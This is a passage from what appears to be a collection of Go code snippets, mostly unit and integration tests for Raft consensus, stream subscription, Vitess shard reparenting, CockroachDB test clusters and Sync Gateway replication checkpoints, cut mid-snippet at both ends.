ar.Pull.Checkpointer.Stats().GetCheckpointHitCount)\n\n\t// wait for document originally written to rt2 to arrive at rt1\n\tchangesResults, err = rt1.WaitForChanges(1, \"/db/_changes?since=0\", \"\", true)\n\trequire.NoError(t, err)\n\trequire.Len(t, changesResults.Results, 1)\n\tassert.Equal(t, docID, changesResults.Results[0].ID)\n\n\tdoc, err = rt1.GetDatabase().GetDocument(logger.TestCtx(t), docID, db.DocUnmarshalAll)\n\trequire.NoError(t, err)\n\n\tbody, err = doc.GetDeepMutableBody()\n\trequire.NoError(t, err)\n\tassert.Equal(t, \"rt2\", body[\"source\"])\n\n\t// one _changes from seq:0 with initial number of docs sent\n\tendNumChangesRequestedFromZeroTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tassert.Equal(t, numChangesRequestedFromZeroTotal+1, endNumChangesRequestedFromZeroTotal)\n\n\t// make sure rt2 thinks it has sent all of the revs via a 2.x replicator\n\tnumRevsSentTotal = rt2.GetDatabase().DbStats.CBLReplicationPull().RevSendCount.Value()\n\tassert.Equal(t, startNumRevsSentTotal+2, numRevsSentTotal)\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().ProcessedSequenceCount)\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().ExpectedSequenceCount)\n\n\t// assert the second active replicator stats\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().GetCheckpointMissCount)\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n\tar.Pull.Checkpointer.CheckpointNow()\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n\n\tassert.NoError(t, ar.Stop())\n}", "func TestSubscribeStreamNotLeader(t *testing.T) {\n\tdefer cleanupStorage(t)\n\n\t// Use a central NATS server.\n\tns := natsdTest.RunDefaultServer()\n\tdefer ns.Shutdown()\n\n\t// Configure first server.\n\ts1Config := getTestConfig(\"a\", true, 5050)\n\ts1 := runServerWithConfig(t, s1Config)\n\tdefer s1.Stop()\n\n\t// Configure second server.\n\ts2Config := getTestConfig(\"b\", false, 5051)\n\ts2 := runServerWithConfig(t, s2Config)\n\tdefer s2.Stop()\n\n\tgetMetadataLeader(t, 10*time.Second, s1, s2)\n\n\t// Create the stream.\n\tclient, err := lift.Connect([]string{\"localhost:5050\"})\n\trequire.NoError(t, err)\n\tdefer client.Close()\n\n\tname := \"foo\"\n\tsubject := \"foo\"\n\terr = client.CreateStream(context.Background(), subject, name,\n\t\tlift.ReplicationFactor(2))\n\trequire.NoError(t, err)\n\n\trequire.NoError(t, client.Close())\n\n\t// Wait for both nodes to create stream.\n\twaitForPartition(t, 5*time.Second, name, 0, s1, s2)\n\n\t// Connect to the server that is the stream follower.\n\tleader := getPartitionLeader(t, 10*time.Second, name, 0, s1, s2)\n\tvar followerConfig *Config\n\tif leader == s1 {\n\t\tfollowerConfig = s2Config\n\t} else {\n\t\tfollowerConfig = s1Config\n\t}\n\tconn, err := grpc.Dial(fmt.Sprintf(\"localhost:%d\", followerConfig.Port), grpc.WithInsecure())\n\trequire.NoError(t, err)\n\tdefer conn.Close()\n\tapiClient := proto.NewAPIClient(conn)\n\n\t// Subscribe on the follower.\n\tstream, err := apiClient.Subscribe(context.Background(), &proto.SubscribeRequest{Stream: name})\n\trequire.NoError(t, err)\n\t_, err = stream.Recv()\n\trequire.Error(t, err)\n\trequire.Contains(t, err.Error(), \"Server not partition leader\")\n}", "func TestMultiNodePropose(t *testing.T) {\n\tmn := newMultiNode(1)\n\tgo mn.run()\n\ts := NewMemoryStorage()\n\tmn.CreateGroup(1, newTestConfig(1, nil, 10, 1, s), []Peer{{ID: 1}})\n\tmn.Campaign(context.TODO(), 1)\n\tproposed := false\n\tfor {\n\t\trds := <-mn.Ready()\n\t\trd := rds[1]\n\t\ts.Append(rd.Entries)\n\t\t// Once we are the leader, propose a command.\n\t\tif !proposed && rd.SoftState.Lead == mn.id {\n\t\t\tmn.Propose(context.TODO(), 1, []byte(\"somedata\"))\n\t\t\tproposed = true\n\t\t}\n\t\tmn.Advance(rds)\n\n\t\t// Exit when we have three entries: one ConfChange, one no-op for the election,\n\t\t// and our proposed command.\n\t\tlastIndex, err := s.LastIndex()\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t\tif lastIndex >= 3 {\n\t\t\tbreak\n\t\t}\n\t}\n\tmn.Stop()\n\n\tlastIndex, err := s.LastIndex()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tentries, err := s.Entries(lastIndex, lastIndex+1, noLimit)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif len(entries) != 1 {\n\t\tt.Fatalf(\"len(entries) = %d, want %d\", len(entries), 1)\n\t}\n\tif !bytes.Equal(entries[0].Data, []byte(\"somedata\")) {\n\t\tt.Errorf(\"entries[0].Data = %v, want %v\", entries[0].Data, []byte(\"somedata\"))\n\t}\n}", "func TestRaftRemoveLeader(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tID3 := \"3\"\n\tclusterPrefix := \"TestRaftRemoveLeader\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\t// Create n2.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\t// Create n3.\n\tfsm3 := newTestFSM(ID3)\n\tn3 := testCreateRaftNode(getTestConfig(ID3, clusterPrefix+ID3), newStorage())\n\n\tconnectAllNodes(n1, n2, n3)\n\n\t// The cluster starts with only one node -- n1.\n\tn1.Start(fsm1)\n\tn1.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it becomes to leader.\n\t<-fsm1.leaderCh\n\n\t// Add n2 to the cluster.\n\tpending := n1.AddNode(ID2)\n\tn2.Start(fsm2)\n\t// Wait until n2 gets joined.\n\t<-pending.Done\n\n\t// Add n3 to the cluster.\n\tpending = n1.AddNode(ID3)\n\tn3.Start(fsm3)\n\t// Wait until n3 gets joined.\n\t<-pending.Done\n\n\t// Now we have a cluster with 3 nodes and n1 as the leader.\n\n\t// Remove the leader itself.\n\tn1.RemoveNode(ID1)\n\n\t// A new leader should be elected in new configuration(n2, n3).\n\tvar newLeader *Raft\n\tselect {\n\tcase <-fsm2.leaderCh:\n\t\tnewLeader = n2\n\tcase <-fsm3.leaderCh:\n\t\tnewLeader = n1\n\t}\n\n\tnewLeader.Propose([]byte(\"data1\"))\n\tnewLeader.Propose([]byte(\"data2\"))\n\tnewLeader.Propose([]byte(\"data3\"))\n\n\t// Now n2 and n3 should commit newly proposed entries eventually>\n\tif !testEntriesEqual(fsm2.appliedCh, fsm3.appliedCh, 3) {\n\t\tt.Fatal(\"two FSMs in same group applied different sequence of commands.\")\n\t}\n}", "func TestInitMasterShard(t *testing.T) {\n\tctx := context.Background()\n\tdb := fakesqldb.New(t)\n\tdefer db.Close()\n\tts := memorytopo.NewServer(\"cell1\", \"cell2\")\n\twr := wrangler.New(logutil.NewConsoleLogger(), ts, tmclient.NewTabletManagerClient())\n\tvp := NewVtctlPipe(t, ts)\n\tdefer vp.Close()\n\n\tdb.AddQuery(\"CREATE DATABASE IF NOT EXISTS `vt_test_keyspace`\", &sqltypes.Result{})\n\n\t// Create a master, a couple good slaves\n\tmaster := NewFakeTablet(t, wr, \"cell1\", 0, topodatapb.TabletType_MASTER, db)\n\tgoodSlave1 := NewFakeTablet(t, wr, \"cell1\", 1, topodatapb.TabletType_REPLICA, db)\n\tgoodSlave2 := NewFakeTablet(t, wr, \"cell2\", 2, topodatapb.TabletType_REPLICA, db)\n\n\t// Master: set a plausible ReplicationPosition to return,\n\t// and expect to add entry in _vt.reparent_journal\n\tmaster.FakeMysqlDaemon.CurrentMasterPosition = mysql.Position{\n\t\tGTIDSet: mysql.MariadbGTIDSet{\n\t\t\tmysql.MariadbGTID{\n\t\t\t\tDomain: 5,\n\t\t\t\tServer: 456,\n\t\t\t\tSequence: 890,\n\t\t\t},\n\t\t},\n\t}\n\tmaster.FakeMysqlDaemon.ReadOnly = true\n\tmaster.FakeMysqlDaemon.ExpectedExecuteSuperQueryList = []string{\n\t\t\"FAKE RESET ALL REPLICATION\",\n\t\t\"CREATE DATABASE IF NOT EXISTS _vt\",\n\t\t\"SUBCREATE TABLE IF NOT EXISTS _vt.reparent_journal\",\n\t\t\"CREATE DATABASE IF NOT EXISTS _vt\",\n\t\t\"SUBCREATE TABLE IF NOT EXISTS _vt.reparent_journal\",\n\t\t\"SUBINSERT INTO _vt.reparent_journal (time_created_ns, action_name, master_alias, replication_position) VALUES\",\n\t}\n\tmaster.StartActionLoop(t, wr)\n\tdefer master.StopActionLoop(t)\n\n\t// Slave1: expect to be reset and re-parented\n\tgoodSlave1.FakeMysqlDaemon.ReadOnly = true\n\tgoodSlave1.FakeMysqlDaemon.SetSlavePositionPos = master.FakeMysqlDaemon.CurrentMasterPosition\n\tgoodSlave1.FakeMysqlDaemon.SetMasterInput = topoproto.MysqlAddr(master.Tablet)\n\tgoodSlave1.FakeMysqlDaemon.ExpectedExecuteSuperQueryList = []string{\n\t\t\"FAKE RESET ALL REPLICATION\",\n\t\t\"FAKE SET SLAVE POSITION\",\n\t\t\"FAKE SET MASTER\",\n\t\t\"START SLAVE\",\n\t}\n\tgoodSlave1.StartActionLoop(t, wr)\n\tdefer goodSlave1.StopActionLoop(t)\n\n\t// Slave2: expect to be re-parented\n\tgoodSlave2.FakeMysqlDaemon.ReadOnly = true\n\tgoodSlave2.FakeMysqlDaemon.SetSlavePositionPos = master.FakeMysqlDaemon.CurrentMasterPosition\n\tgoodSlave2.FakeMysqlDaemon.SetMasterInput = topoproto.MysqlAddr(master.Tablet)\n\tgoodSlave2.FakeMysqlDaemon.ExpectedExecuteSuperQueryList = []string{\n\t\t\"FAKE RESET ALL REPLICATION\",\n\t\t\"FAKE SET SLAVE POSITION\",\n\t\t\"FAKE SET MASTER\",\n\t\t\"START SLAVE\",\n\t}\n\tgoodSlave2.StartActionLoop(t, wr)\n\tdefer goodSlave2.StopActionLoop(t)\n\n\t// run InitShardMaster\n\tif err := vp.Run([]string{\"InitShardMaster\", \"-wait_slave_timeout\", \"10s\", master.Tablet.Keyspace + \"/\" + master.Tablet.Shard, topoproto.TabletAliasString(master.Tablet.Alias)}); err != nil {\n\t\tt.Fatalf(\"InitShardMaster failed: %v\", err)\n\t}\n\n\t// check what was run\n\tif master.FakeMysqlDaemon.ReadOnly {\n\t\tt.Errorf(\"master was not turned read-write\")\n\t}\n\tsi, err := ts.GetShard(ctx, master.Tablet.Keyspace, master.Tablet.Shard)\n\tif err != nil {\n\t\tt.Fatalf(\"GetShard failed: %v\", err)\n\t}\n\tif !topoproto.TabletAliasEqual(si.MasterAlias, master.Tablet.Alias) {\n\t\tt.Errorf(\"unexpected shard master alias, got %v expected %v\", si.MasterAlias, master.Tablet.Alias)\n\t}\n\tif err := master.FakeMysqlDaemon.CheckSuperQueryList(); err != nil {\n\t\tt.Fatalf(\"master.FakeMysqlDaemon.CheckSuperQueryList failed: %v\", err)\n\t}\n\tif err := goodSlave1.FakeMysqlDaemon.CheckSuperQueryList(); err != nil {\n\t\tt.Fatalf(\"goodSlave1.FakeMysqlDaemon.CheckSuperQueryList failed: %v\", err)\n\t}\n\tif err := goodSlave2.FakeMysqlDaemon.CheckSuperQueryList(); err != nil {\n\t\tt.Fatalf(\"goodSlave2.FakeMysqlDaemon.CheckSuperQueryList failed: %v\", err)\n\t}\n\tcheckSemiSyncEnabled(t, true, true, master)\n\tcheckSemiSyncEnabled(t, false, true, goodSlave1, goodSlave2)\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n\tif !rf.IsLeader() {\n\t\treturn -1, -1, false\n\t}\n\n\t// incrementing logIndex should be execute with adding entry atomically\n\t// entry needs to be added in order\n\trf.mu.Lock()\n\trf.logIndex += 1\n\tentry := LogEntry{\n\t\tCommand: command,\n\t\tIndex: rf.logIndex,\n\t\tTerm: rf.currentTerm,\n\t}\n\t// append locally\n\trf.logs[entry.Index] = entry\n\trf.matchIndex[rf.me] = rf.logIndex\n\t_, _ = rf.dprintf(\"Term_%-4d [%d]:%-9s start to replicate a log at %d:%v\\n\", rf.currentTerm, rf.me, rf.getRole(), rf.logIndex, entry)\n\trf.persist()\n\trf.mu.Unlock()\n\n\treturn int(entry.Index), int(entry.Term), true\n}", "func (ltc *LocalTestCluster) Start(t util.Tester) {\n\tnodeID := roachpb.NodeID(1)\n\tnodeDesc := &roachpb.NodeDescriptor{NodeID: nodeID}\n\tltc.tester = t\n\tltc.Manual = hlc.NewManualClock(0)\n\tltc.Clock = hlc.NewClock(ltc.Manual.UnixNano)\n\tltc.Stopper = stop.NewStopper()\n\trpcContext := rpc.NewContext(testutils.NewNodeTestBaseContext(), ltc.Clock, ltc.Stopper)\n\tltc.Gossip = gossip.New(rpcContext, nil, ltc.Stopper)\n\tltc.Eng = engine.NewInMem(roachpb.Attributes{}, 50<<20, ltc.Stopper)\n\n\tltc.stores = storage.NewStores(ltc.Clock)\n\ttracer := tracing.NewTracer()\n\tvar rpcSend rpcSendFn = func(_ SendOptions, _ ReplicaSlice,\n\t\targs roachpb.BatchRequest, _ *rpc.Context) (*roachpb.BatchResponse, error) {\n\t\tif ltc.Latency > 0 {\n\t\t\ttime.Sleep(ltc.Latency)\n\t\t}\n\t\tsp := tracer.StartSpan(\"node\")\n\t\tdefer sp.Finish()\n\t\tctx := opentracing.ContextWithSpan(context.Background(), sp)\n\t\tlog.Trace(ctx, args.String())\n\t\tbr, pErr := ltc.stores.Send(ctx, args)\n\t\tif br == nil {\n\t\t\tbr = &roachpb.BatchResponse{}\n\t\t}\n\t\tif br.Error != nil {\n\t\t\tpanic(roachpb.ErrorUnexpectedlySet(ltc.stores, br))\n\t\t}\n\t\tbr.Error = pErr\n\t\tif pErr != nil {\n\t\t\tlog.Trace(ctx, \"error: \"+pErr.String())\n\t\t}\n\t\treturn br, nil\n\t}\n\tretryOpts := GetDefaultDistSenderRetryOptions()\n\tretryOpts.Closer = ltc.Stopper.ShouldDrain()\n\tltc.distSender = NewDistSender(&DistSenderContext{\n\t\tClock: ltc.Clock,\n\t\tRangeDescriptorCacheSize: defaultRangeDescriptorCacheSize,\n\t\tRangeLookupMaxRanges: defaultRangeLookupMaxRanges,\n\t\tLeaderCacheSize: defaultLeaderCacheSize,\n\t\tRPCRetryOptions: &retryOpts,\n\t\tnodeDescriptor: nodeDesc,\n\t\tRPCSend: rpcSend, // defined above\n\t\tRangeDescriptorDB: ltc.stores, // for descriptor lookup\n\t}, ltc.Gossip)\n\n\tltc.Sender = NewTxnCoordSender(ltc.distSender, ltc.Clock, false /* !linearizable */, tracer,\n\t\tltc.Stopper, NewTxnMetrics(metric.NewRegistry()))\n\tltc.DB = client.NewDB(ltc.Sender)\n\ttransport := storage.NewDummyRaftTransport()\n\tctx := storage.TestStoreContext()\n\tctx.Clock = ltc.Clock\n\tctx.DB = ltc.DB\n\tctx.Gossip = ltc.Gossip\n\tctx.Transport = transport\n\tctx.Tracer = tracer\n\tltc.Store = storage.NewStore(ctx, ltc.Eng, nodeDesc)\n\tif err := ltc.Store.Bootstrap(roachpb.StoreIdent{NodeID: nodeID, StoreID: 1}, ltc.Stopper); err != nil {\n\t\tt.Fatalf(\"unable to start local test cluster: %s\", err)\n\t}\n\tltc.stores.AddStore(ltc.Store)\n\tif err := ltc.Store.BootstrapRange(nil); err != nil {\n\t\tt.Fatalf(\"unable to start local test cluster: %s\", err)\n\t}\n\tif err := ltc.Store.Start(ltc.Stopper); err != nil {\n\t\tt.Fatalf(\"unable to start local test cluster: %s\", err)\n\t}\n\tltc.Gossip.SetNodeID(nodeDesc.NodeID)\n\tif err := ltc.Gossip.SetNodeDescriptor(nodeDesc); err != nil {\n\t\tt.Fatalf(\"unable to set node descriptor: %s\", err)\n\t}\n}", "func TestSplit(t *testing.T){\r\n\tif !TESTSPLIT{\r\n\t\treturn\r\n\t}\r\n\tcontents := make([]string, 2)\r\n\tcontents[0] = \"duckduck\"\r\n\tcontents[1] = \"go\"\r\n\tmkcl, err := mock.NewCluster(\"input_spec.json\")\r\n\trafts,err := makeMockRafts(mkcl,\"log\", 250, 350) \r\n\tcheckError(t,err, \"While creating mock clusters\")\r\n\ttime.Sleep(5*time.Second)\r\n\trafts[0].Append([]byte(contents[0]))\r\n\ttime.Sleep(5*time.Second)\r\n\tmkcl.Lock()\r\n\tpart1 := []int{1,3}\r\n\tpart2 := []int{2,4}\r\n\trafts[1].smLock.RLock()\r\n\tldrId := rafts[4].LeaderId()\r\n\trafts[1].smLock.RUnlock()\r\n\tfmt.Printf(\"ldrId:%v\\n\", ldrId)\r\n\tif ldrId % 2 == 0{\r\n\t\tpart2 = append(part2, 5)\r\n\t}else{\r\n\t\tpart1 = append(part1, 5)\r\n\t}\r\n\tmkcl.Unlock()\r\n\tmkcl.Partition(part1, part2)\r\n\tdebugRaftTest(fmt.Sprintf(\"Partitions: %v %v\\n\", part1, part2))\r\n\ttime.Sleep(4*time.Second)\r\n\tmkcl.Lock()\r\n\trafts[ldrId-1].Append([]byte(contents[1]))\r\n\tmkcl.Unlock()\r\n\ttime.Sleep(8*time.Second)\r\n\tmkcl.Heal()\r\n\tdebugRaftTest(fmt.Sprintf(\"Healed\\n\"))\r\n\ttime.Sleep(8*time.Second)\r\n\tciarr := []int{0,0,0,0,0}\r\n\tfor cnt:=0;cnt<5;{\r\n\t\tfor idx, node := range rafts {\r\n\t\t\tselect {\r\n\t\t\tcase ci := <-node.CommitChannel():\r\n\t\t\t\tif ci.Err != nil {\r\n\t\t\t\t\tfmt.Fprintln(os.Stderr,ci.Err)\r\n\t\t\t\t}\r\n\t\t\t\t//Testing CommitChannel \r\n\t\t\t\texpect(t,contents[ciarr[idx]],string(ci.Data))\r\n\t\t\t\tciarr[idx] += 1\r\n\t\t\t\tif ciarr[idx] == 2{\r\n\t\t\t\t\tcnt +=1 \r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\tfor _, node := range rafts {\r\n\t\tnode.smLock.RLock()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"%v\", node.sm.String()))\r\n\t\tnode.smLock.RUnlock()\r\n\t\tnode.Shutdown()\r\n\t}\r\n}", "func TestCommitWithoutNewTermEntry(t *testing.T) {\n\ttt := newNetwork(nil, nil, nil, nil, nil)\n\tdefer tt.closeAll()\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// 0 cannot reach 2,3,4\n\ttt.cut(1, 3)\n\ttt.cut(1, 4)\n\ttt.cut(1, 5)\n\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tsm := tt.peers[1].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\t// network recovery\n\ttt.recover()\n\n\t// elect 1 as the new leader with term 2\n\t// after append a ChangeTerm entry from the current term, all entries\n\t// should be committed\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\tif sm.raftLog.committed != 4 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 4)\n\t}\n}", "func TestRaft1(t *testing.T) {\n\n\t//Remove any state recovery files\n\tfor i := 0; i < 5; i++ {\n\t\tos.Remove(fmt.Sprintf(\"%s_S%d.state\", raft.FILENAME, i))\n\t}\n\n\tgo main() //Starts all servers\n\n\tvar leaderId1, leaderId2 int\n\tack := make(chan bool)\n\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId1 = raft.KillLeader() //Kill leader\n\t\tlog.Print(\"Killed leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(2*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId2 = raft.KillLeader() //Kill current leader again\n\t\tlog.Print(\"Killed leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(3*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServer(leaderId2) //Resurrect last killed as follower\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(4*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServerAsLeader(leaderId1) //Ressurect first one as leader\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(5*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tack <- true\n\t})\n\n\t<-ack\n}", "func testNonleaderStartElection(t *testing.T, state StateType) {\n\t// election timeout\n\tet := 10\n\tr := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tswitch state {\n\tcase StateFollower:\n\t\tr.becomeFollower(1, 2)\n\tcase StateCandidate:\n\t\tr.becomeCandidate()\n\t}\n\n\tfor i := 1; i < 2*et; i++ {\n\t\tr.tick()\n\t}\n\n\tif r.Term != 2 {\n\t\tt.Errorf(\"term = %d, want 2\", r.Term)\n\t}\n\tif r.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", r.state, StateCandidate)\n\t}\n\tif !r.votes[r.id] {\n\t\tt.Errorf(\"vote for self = false, want true\")\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %v, want %v\", msgs, wmsgs)\n\t}\n}", "func (r *Raft) replicateTo(replication *followerReplication, lastIndex uint64) (shouldStop bool) {\n\tvar peer Server\n\tvar req pb.AppendEntriesRequest\n\tvar resp pb.AppendEntriesResponse\n\nStart:\n\t// Prevent an excessive retry rate on errors\n\tif replication.failures > 0 {\n\t\tselect {\n\t\tcase <-time.After(backoff(failureWait, replication.failures, maxFailureScale)):\n\t\tcase <-r.shutdownCh:\n\t\t}\n\t}\n\n\treplication.peerLock.RLock()\n\tpeer = replication.peer\n\treplication.peerLock.RUnlock()\n\n\t// Setup the request\n\tif err := r.setupAppendEntries(replication, &req, atomic.LoadUint64(&replication.nextIndex), lastIndex); err == ErrLogNotFound {\n\t\tgoto SendSnap\n\t} else if err != nil {\n\t\treturn\n\t}\n\n\t// Make the RPC call\n\tif err := r.transport.AppendEntries(peer.ID, peer.Address, &req, &resp); err != nil {\n\t\tklog.Errorf(fmt.Sprintf(\"failed to appendEntries from %s/%s to peer:%s/%s err:%v\",\n\t\t\tr.localID, r.localAddr, peer.ID, peer.Address, err))\n\t\treplication.failures++\n\t\treturn\n\t}\n\n\t// Check for a newer term, stop running\n\tif resp.Term > req.Term {\n\t\tr.handleStaleTerm(replication)\n\t\treturn true\n\t}\n\n\t// Update the last contact\n\treplication.setLastContact()\n\n\t// Update s based on success\n\tif resp.Success {\n\t\t// Update our replication state\n\t\tupdateLastAppended(replication, &req)\n\n\t\t// Clear any failures, allow pipelining\n\t\treplication.failures = 0\n\t\treplication.allowPipeline = true\n\t} else {\n\t\tatomic.StoreUint64(&replication.nextIndex, max(min(replication.nextIndex-1, resp.LastLog+1), 1))\n\t\tif resp.NoRetryBackoff {\n\t\t\treplication.failures = 0\n\t\t} else {\n\t\t\treplication.failures++\n\t\t}\n\t\tklog.Warningf(fmt.Sprintf(\"appendEntries rejected, sending older logs to peer:%s/%s nextIndex:%d\",\n\t\t\tpeer.ID, peer.Address, atomic.LoadUint64(&replication.nextIndex)))\n\t}\n\nCheckMore:\n\t// Poll the stop channel here in case we are looping and have been asked\n\t// to stop, or have stepped down as leader. Even for the best effort case\n\t// where we are asked to replicate to a given index and then shutdown,\n\t// it's better to not loop in here to send lots of entries to a straggler\n\t// that's leaving the cluster anyways.\n\tselect {\n\tcase <-replication.stopCh:\n\t\treturn true\n\tdefault:\n\t}\n\n\t// Check if there are more logs to replicate\n\tif atomic.LoadUint64(&replication.nextIndex) <= lastIndex {\n\t\tgoto Start\n\t}\n\treturn\n\n\t// SEND_SNAP is used when we fail to get a log, usually because the follower\n\t// is too far behind, and we must ship a snapshot down instead\nSendSnap:\n\tif stop, err := r.sendLatestSnapshot(replication); stop {\n\t\treturn true\n\t} else if err != nil {\n\t\tklog.Errorf(fmt.Sprintf(\"failed to send snapshot to peer:%s/%s err:%v\", peer.ID, peer.Address, err))\n\t\treturn\n\t}\n\n\t// Check if there is more to replicate\n\tgoto CheckMore\n}", "func TestActiveReplicatorPushFromCheckpoint(t *testing.T) {\n\n\tbase.RequireNumTestBuckets(t, 2)\n\n\tbase.SetUpTestLogging(t, logger.LevelInfo, logger.KeyReplicate, logger.KeyHTTP, logger.KeyHTTPResp, logger.KeySync, logger.KeySyncMsg)\n\n\tconst (\n\t\tchangesBatchSize = 10\n\t\tnumRT1DocsInitial = 13 // 2 batches of changes\n\t\tnumRT1DocsTotal = 24 // 2 more batches\n\t)\n\n\t// Active\n\ttb1 := base.GetTestBucket(t)\n\trt1 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: tb1,\n\t})\n\tdefer rt1.Close()\n\n\t// Create first batch of docs\n\tdocIDPrefix := t.Name() + \"rt2doc\"\n\tfor i := 0; i < numRT1DocsInitial; i++ {\n\t\tresp := rt1.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, i), `{\"source\":\"rt1\",\"channels\":[\"alice\"]}`)\n\t\tassertStatus(t, resp, http.StatusCreated)\n\t}\n\n\t// Passive\n\ttb2 := base.GetTestBucket(t)\n\trt2 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: tb2,\n\t\tDatabaseConfig: &DatabaseConfig{DbConfig: DbConfig{\n\t\t\tUsers: map[string]*db.PrincipalConfig{\n\t\t\t\t\"alice\": {\n\t\t\t\t\tPassword: base.StringPtr(\"pass\"),\n\t\t\t\t\tExplicitChannels: utils.SetOf(\"alice\"),\n\t\t\t\t},\n\t\t\t},\n\t\t}},\n\t})\n\tdefer rt2.Close()\n\n\t// Make rt2 listen on an actual HTTP port, so it can receive the blipsync request from rt1\n\tsrv := httptest.NewServer(rt2.TestPublicHandler())\n\tdefer srv.Close()\n\n\t// Build passiveDBURL with basic auth creds\n\tpassiveDBURL, err := url.Parse(srv.URL + \"/db\")\n\trequire.NoError(t, err)\n\tpassiveDBURL.User = url.UserPassword(\"alice\", \"pass\")\n\n\tarConfig := db.ActiveReplicatorConfig{\n\t\tID: t.Name(),\n\t\tDirection: db.ActiveReplicatorTypePush,\n\t\tRemoteDBURL: passiveDBURL,\n\t\tActiveDB: &db.Database{\n\t\t\tDatabaseContext: rt1.GetDatabase(),\n\t\t},\n\t\tContinuous: true,\n\t\tChangesBatchSize: changesBatchSize,\n\t}\n\n\t// Create the first active replicator to pull from seq:0\n\tarConfig.ReplicationStatsMap = base.SyncGatewayStats.NewDBStats(t.Name()+\"1\", false, false, false).DBReplicatorStats(t.Name())\n\tar := db.NewActiveReplicator(&arConfig)\n\n\tstartNumChangesRequestedFromZeroTotal := rt1.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tstartNumRevsSentTotal := ar.Push.GetStats().SendRevCount.Value()\n\n\tassert.NoError(t, ar.Start())\n\n\t// wait for all of the documents originally written to rt1 to arrive at rt2\n\tchangesResults, err := rt2.WaitForChanges(numRT1DocsInitial, \"/db/_changes?since=0\", \"\", true)\n\trequire.NoError(t, err)\n\trequire.Len(t, changesResults.Results, numRT1DocsInitial)\n\tdocIDsSeen := make(map[string]bool, numRT1DocsInitial)\n\tfor _, result := range changesResults.Results {\n\t\tdocIDsSeen[result.ID] = true\n\t}\n\tfor i := 0; i < numRT1DocsInitial; i++ {\n\t\tdocID := fmt.Sprintf(\"%s%d\", docIDPrefix, i)\n\t\tassert.True(t, docIDsSeen[docID])\n\n\t\tdoc, err := rt1.GetDatabase().GetDocument(logger.TestCtx(t), docID, db.DocUnmarshalAll)\n\t\tassert.NoError(t, err)\n\n\t\tbody, err := doc.GetDeepMutableBody()\n\t\trequire.NoError(t, err)\n\t\tassert.Equal(t, \"rt1\", body[\"source\"])\n\t}\n\n\t// one _changes from seq:0 with initial number of docs sent\n\tnumChangesRequestedFromZeroTotal := rt1.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tassert.Equal(t, startNumChangesRequestedFromZeroTotal+1, numChangesRequestedFromZeroTotal)\n\n\t// rev assertions\n\tnumRevsSentTotal := ar.Push.GetStats().SendRevCount.Value()\n\tassert.Equal(t, startNumRevsSentTotal+numRT1DocsInitial, numRevsSentTotal)\n\tassert.Equal(t, int64(numRT1DocsInitial), ar.Push.Checkpointer.Stats().ProcessedSequenceCount)\n\tassert.Equal(t, int64(numRT1DocsInitial), 